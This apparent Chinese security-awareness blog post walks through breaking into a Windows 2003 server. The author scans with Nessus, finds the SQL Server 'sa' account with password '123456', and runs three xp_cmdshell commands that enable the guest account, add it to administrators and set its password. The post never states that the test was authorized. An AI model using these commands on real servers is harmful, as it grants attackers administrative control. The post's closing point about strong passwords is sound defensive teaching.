摘要: 事情其实很简单的,就是游侠想测试下某服务器的安全性。没有别的理由…… 说一下:去过很多单位,很多负责信息安全或安全保密的管理人员或技术人员对网络安全漏洞的危害并不清楚,不知道前一段的《密战》让多少人感觉必须增强保密意识?必须增强安全防范手段? 不多说废话了,L...
事情其实很简单的,就是游侠想测试下某服务器的安全性。没有别的理由……
说一下:去过很多单位,很多负责信息安全或安全保密的管理人员或技术人员对网络安全漏洞的危害并不清楚,不知道前一段的《密战》让多少人感觉必须增强保密意识?必须增强安全防范手段?
不多说废话了,Let's Go !
说下简单情况:
- 服务器操作系统:Windows 2003 Server
- 此前知道开放了终端服务。
下面说下过程,很简单,安全知识普及文章。
1、扫描服务器
还是喜欢用Nessus,虽然Unix下面的报表功能更强大,但是实际上普通的漏洞评估用Windows版本的就够了,如果你不熟悉怎么操作,可以看我前一段写的文章:[网路游侠:免费网络和主机漏洞评估程序Nessus 4.2.0安装试用]。
添加主机地址、扫描规则后,等几分钟,出来扫描结果:
概况看到了,服务器几乎没有经过安全配置,高级别漏洞有3个。分别是:
- MS08-040: Microsoft SQL Server Multiple Privilege Escalation (941203) (uncredentialed check)
- MS09-004: Vulnerability in Microsoft SQL Server Could Allow Remote Code Execution (959420) (uncredentialed check)
- Microsoft SQL Server Default Credentials
不用多看,一眼扫下来,就看到第三个报警的说明:
Plugin output :
The following credentials were discovered for the remote SQL Server :
Account 'sa' has password '123456'
默认帐号和弱密码……恩,这样可操作的就多了,并且就主机的扫描情况来看,几十个报警信息,肯定是没有经过任何配置的……那么,行动顺利了很多。
既然SQL Server有问题,我们就从它入手吧……还好机子装了这个,打开查询分析器,分别执行下列3条语句:
xp_cmdshell 'net user guest /active:yes'
xp_cmdshell 'net localgroup administrators guest add'
xp_cmdshell 'net user guest youxia'
语句执行成功会提示:
说明下,3条命令分别是:
- 激活guest帐号
- 把guest帐号增加到administrators组
- 修改guest的密码为youxia
好了,到此为止,我们通过SQL查询分析器在服务器增加了帐号并提升到了管理员组,下面做什么就不用游侠说了吧?嘿嘿
看看表,需要多久?手稍微利索一点,5分钟差不多吧?
当然,如果管理员能修改SQL Server密码为复杂密码,可能这个渗透过程就要麻烦多了……安全习惯很重要。